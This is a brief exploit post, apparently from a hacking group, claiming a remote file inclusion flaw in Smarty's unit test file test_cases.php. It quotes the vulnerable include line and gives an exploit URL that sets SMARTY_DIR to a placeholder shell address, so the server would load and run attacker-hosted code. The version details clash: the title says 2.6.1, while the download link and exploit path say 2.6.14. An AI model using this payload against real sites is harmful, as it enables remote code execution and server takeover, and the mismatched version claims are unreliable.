Smarty-2.6.1 suffers from a remote file inclusion vulnerability in test_cases.php.
0c251ac507b07521fca880f1e913df2aee85a60d2d2d05b022a9520a2844f003
!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!
--------------------------------------------------------------------------------
Title : Smarty-2.6.1 Remote File Include Vulnerabilities
--------------------------------------------------------------------------------
#Author: Crackers_Child
#cont@ct: crackers_child@sibersavascilar.com
--------------------------------------------------------------------------------
------------------------- -------------------------------------------------------
Application Download : http://smarty.php.net/do_download.php?download_file=Smarty-2.6.14.tar.gz
--------------------------------------------------------------------------------
Bug İn test_cases.php
<?php
require_once './config.php';
require_once SMARTY_DIR . 'Smarty.class.php';
require_once 'PHPUnit.php';
--------------------------------------------------------------------------------
Exploit:
http://www.site.com/Smarty-2.6.14/unit_test/test_cases.php?SMARTY_DIR=Sh3ll?
--------------------------------------------------------------------------------
greets:
X_ALPEREN_X and All SiberSavascilar.CoM Members !
--------------------------------------------------------------------------------
--------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] --------------------------------------